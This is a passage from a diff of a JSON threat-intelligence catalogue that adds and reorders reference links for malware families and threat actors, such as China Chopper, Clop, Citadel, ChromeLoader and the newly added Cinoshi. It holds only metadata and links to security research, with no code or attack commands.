"https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4", - "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", - "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", - "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", - "https://blog.joshlemon.com.au/hafnium-exchange-attacks/", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", - "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", - "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://attack.mitre.org/groups/G0125/", - "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", - "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", + "https://attack.mitre.org/groups/G0096", "https://attack.mitre.org/software/S0020/", - "https://unit42.paloaltonetworks.com/china-chopper-webshell/", - "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", - "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", - "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", - "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/", - "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/", - "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", - "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a", - "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", - "https://twitter.com/ESETresearch/status/1366862946488451088", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks", - "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", - "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", - "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers", - "https://www.secureworks.com/research/threat-profiles/bronze-president", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/", "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4", + "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion", "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage" + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://unit42.paloaltonetworks.com/china-chopper-webshell/", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks", + "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968", + "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", + "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://attack.mitre.org/groups/G0125/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", + "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/", + "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", + "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", + "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://blog.joshlemon.com.au/hafnium-exchange-attacks/", + "https://www.youtube.com/watch?v=rn-6t7OygGk", + "https://www.secureworks.com/research/threat-profiles/bronze-president" ], "synonyms": [], "type": [] @@ -17607,7 +18442,9 @@ "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad", + "https://www.malwarebytes.com/blog/news/2015/06/unusual-exploit-kit-targets-chinese-users-part-2", + "https://www.malwarebytes.com/blog/news/2015/05/unusual-exploit-kit-targets-chinese-users-part-1" ], "synonyms": [], "type": [] @@ -17633,11 +18470,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto", + "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92", - "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/", - "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064" + "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/", + "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064", + "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/" ], "synonyms": [], "type": [] @@ -17651,15 +18489,15 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy", "https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf", - "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", - "https://community.riskiq.com/article/5fe2da7f", - "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", - "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", "https://community.riskiq.com/article/56fa1b2f", "https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://community.riskiq.com/article/5fe2da7f", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf", "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02" ], "synonyms": [], @@ -17714,8 +18552,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi", "https://cybergeeks.tech/chromeloader-browser-hijacker", "https://redcanary.com/blog/chromeloader/", + "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension", "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html", - "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension" + "https://www.connectwise.com/blog/threat-report/smash-jacker" ], "synonyms": [ "ChromeLoader" @@ -17732,8 +18571,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ "AndroKINS" @@ -17762,9 +18601,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi", "https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/", "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html", - "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf" + "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/" ], "synonyms": [], "type": [] @@ -17772,17 +18611,35 @@ "uuid": "d0f0f754-fe9b-45bd-a9d2-c6110c807af4", "value": "Cinobi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinoshi", + "https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat", + "https://www.youtube.com/watch?v=-KJ0HIvmVl0", + "https://cyble.com/blog/cinoshi-project-and-the-dark-side-of-free-maas/", + "https://twitter.com/suyog41/status/1633807752127475713?s=20" + ], + "synonyms": [ + "Agniane" + ], + "type": [] + }, + "uuid": "65f75ea8-c06b-4d8d-b757-e992966667b5", + "value": "Cinoshi" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", - "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", + "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/" + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree" ], "synonyms": [], "type": [] @@ -17849,12 +18706,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker", - "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/", "https://asec.ahnlab.com/en/35981/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/" + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", + "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] @@ -17867,81 +18724,84 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", - "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks", - "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", - "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", - "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", - "https://github.com/Tera0017/TAFOF-Unpacker", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", - "https://www.youtube.com/watch?v=PqGaZgepNTE", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://twitter.com/darb0ng/status/1338692764121251840", - "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/", - "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever", - "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", - "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf", + "https://unit42.paloaltonetworks.com/clop-ransomware/", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever", + "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop", - "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", - "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", + "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", + "https://asec.ahnlab.com/en/19542/", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", + "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/", + "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", + "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/", + "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", + "https://www.youtube.com/watch?v=PqGaZgepNTE", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", - "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf", - "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://unit42.paloaltonetworks.com/clop-ransomware/", - "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks", + "https://twitter.com/darb0ng/status/1338692764121251840", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://asec.ahnlab.com/en/19542/", - "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", - "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", - "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/" + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/", + "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://fourcore.io/blogs/clop-ransomware-history-adversary-simulation", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -17954,7 +18814,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst", - "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970" + "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970", + "https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/" ], "synonyms": [], "type": [] @@ -17967,58 +18828,66 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", - "https://labs.k7computing.com/?p=20156", - "https://www.joesecurity.org/blog/3535317197858305930", - "https://blog.morphisec.com/guloader-the-rat-downloader", - "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", - "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", - "https://twitter.com/sysopfb/status/1258809373159305216", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", - "https://www.youtube.com/watch?v=-FxyzuRv6Wg", - 